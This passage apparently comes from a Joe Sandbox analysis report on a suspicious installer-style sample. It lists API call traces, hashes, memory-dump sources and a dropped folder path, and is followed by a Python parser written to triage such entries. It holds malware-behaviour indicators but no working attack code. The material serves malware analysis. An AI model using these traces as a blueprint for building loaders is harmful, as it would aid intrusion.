                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CloseValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsg9061.tmp
                                                                      • API String ID: 2655323295-677182141
                                                                      • Opcode ID: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                      • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                                                      • Opcode Fuzzy Hash: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                      • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
                                                                      APIs
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405C25
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                        • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,00000000,000000F0), ref: 0040164D
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne, xrefs: 00401640
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne
                                                                      • API String ID: 1892508949-920775469
                                                                      • Opcode ID: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
                                                                      • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
                                                                      • Opcode Fuzzy Hash: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
                                                                      • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 004052A2
                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                        • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                      • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                      • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                      • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                        • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,774D23A0), ref: 0040535A
                                                                        • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 004020EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 334405425-0
                                                                      • Opcode ID: 5475f02f106110a916f15ee9ab206587335882ec0c1efca6123a78a63609b3d2
                                                                      • Instruction ID: 589db8f59639f89aa10495d7cc04380c60c8a7cdceb46225d1e949d191b74c22
                                                                      • Opcode Fuzzy Hash: 5475f02f106110a916f15ee9ab206587335882ec0c1efca6123a78a63609b3d2
                                                                      • Instruction Fuzzy Hash: 51218071D00205AACF20AFA5CE4999E7A70BF04358F74813BF511B51E0DBBD8991DB6A
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree
                                                                      • String ID: Call
                                                                      • API String ID: 3394109436-1824292864
                                                                      • Opcode ID: 913a1641bf1678fd544d2f354cdad38cfe4f2c05cfad93494d599300ab092abb
                                                                      • Instruction ID: ae3691a386166457dd68fa0d34360560a99e353b90efe6619b1f582ab4c46bbf
                                                                      • Opcode Fuzzy Hash: 913a1641bf1678fd544d2f354cdad38cfe4f2c05cfad93494d599300ab092abb
                                                                      • Instruction Fuzzy Hash: 9B219973600100DBDB20EF94DD8595E77A4AB44318735053FF102F32D0DBB8A8909BAD
                                                                      APIs
                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$CloseValue
                                                                      • String ID:
                                                                      • API String ID: 397863658-0
                                                                      • Opcode ID: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                      • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                                                      • Opcode Fuzzy Hash: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                      • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastRead
                                                                      • String ID:
                                                                      • API String ID: 1948546556-0
                                                                      • Opcode ID: 6f90f86cf6d8764fa677fdb047acb50334159939b2ee2bc5230630ebbca88e2b
                                                                      • Instruction ID: 3ceb14440f450e335970443c14443374c0bbf61e036525ab485a1b56a4d28c12
                                                                      • Opcode Fuzzy Hash: 6f90f86cf6d8764fa677fdb047acb50334159939b2ee2bc5230630ebbca88e2b
                                                                      • Instruction Fuzzy Hash: D2519F73804204DFEB25DFA1DD42F5D77B9EB64314F2144AAE90ACB320DA78A892CB51
                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3356406503-0
                                                                      • Opcode ID: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                      • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                                                      • Opcode Fuzzy Hash: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                      • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                      • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                      • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                      • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                      APIs
                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnableShow
                                                                      • String ID:
                                                                      • API String ID: 1136574915-0
                                                                      • Opcode ID: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                      • Instruction ID: ed958cdb0af940290ad8e224458c39a91d35accb7d2f19645d781aa9a2f92111
                                                                      • Opcode Fuzzy Hash: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                      • Instruction Fuzzy Hash: ECE01A72E082008FE764ABA5AA495AD77B4EB91325B20847FE211F11D1DE7858418F6A
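The "APIs" lists in these function entries share one textual format: a bullet, an optional "Part of subcall function XXXXXXXX:" prefix, the API name and module, an optional parenthesised list of captured stack values ("?" where the sandbox could not recover one), and ", ref:" followed by the call-site address. When triaging a report of this size it helps to parse those lines into records rather than read them by eye. The following is an added example written for this page; it is not part of the Joe Sandbox report and is not code from the analysed sample. The sample input is constructed from entries in this section (the GetModuleHandleW/LoadLibraryExW/FreeLibrary entry, the RegEnumKeyW/RegCloseKey entry and the GetModuleHandleA/GetProcAddress entry with its GetSystemDirectoryW, wsprintfW and LoadLibraryExW subcalls). The tag names are my own, as are two assumptions marked in the code: that the third captured value of LoadLibraryExW is its dwFlags argument, and that the second captured value of SendMessageW is uMsg. LOAD_WITH_ALTERED_SEARCH_PATH (0x8) and the PBM_/LVM_ message numbers are the documented Win32 constants.

```python
"""Parser and triage heuristics for Joe Sandbox "APIs" function entries.

Added example; not part of the Joe Sandbox report or of the analysed sample.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input, modelled on entries from this report section.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
  • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,774D23A0), ref: 00405337
  • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
• LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
• FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 004020EB
APIs
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
• RegCloseKey.KERNELBASE(?,?,?,C:\\Users\\user\\AppData\\Local\\Temp\\nsg9061.tmp,00000000), ref: 00402557
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
• GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
  • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
  • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
  • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"                      # e.g. LoadLibraryExW.KERNEL32
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
PATH_RE = re.compile(r"[A-Za-z]:\\[^,)]+")   # drive-letter path inside an argument
LOAD_WITH_ALTERED_SEARCH_PATH = 0x8           # LoadLibraryEx dwFlags bit (Win32 constant)
# Window messages seen in NSIS-style installer code: progress bar and details list view
WINDOW_MESSAGES: Dict[int, str] = {
    0x0402: "PBM_SETPOS", 0x1004: "LVM_GETITEMCOUNT",
    0x1013: "LVM_ENSUREVISIBLE", 0x104D: "LVM_INSERTITEMW",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw stack values as captured; "?" = not recovered
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when listed as "Part of subcall function"


@dataclass
class FunctionTrace:
    calls: List[ApiCall] = field(default_factory=list)

    @property
    def direct_calls(self) -> List[ApiCall]:
        return [c for c in self.calls if c.subcall_of is None]


def _hex(value: str) -> Optional[int]:
    try:
        return int(value, 16)
    except ValueError:
        return None                # "?" or other non-numeric capture


def parse_traces(text: str) -> List[FunctionTrace]:
    """Start a new trace at each 'APIs' header; lines that do not match are metadata and skipped."""
    traces: List[FunctionTrace] = []
    current: Optional[FunctionTrace] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionTrace()
            traces.append(current)
            continue
        m = CALL_RE.match(line)
        if m is None or current is None:
            continue
        # Splitting on ',' is a heuristic: a path argument containing a comma would be split.
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
    return traces


def file_paths(trace: FunctionTrace) -> List[str]:
    """Drive-letter paths captured in any argument (cheap host-IOC extraction)."""
    return [p.group(0) for c in trace.calls for a in c.args for p in [PATH_RE.search(a)] if p]


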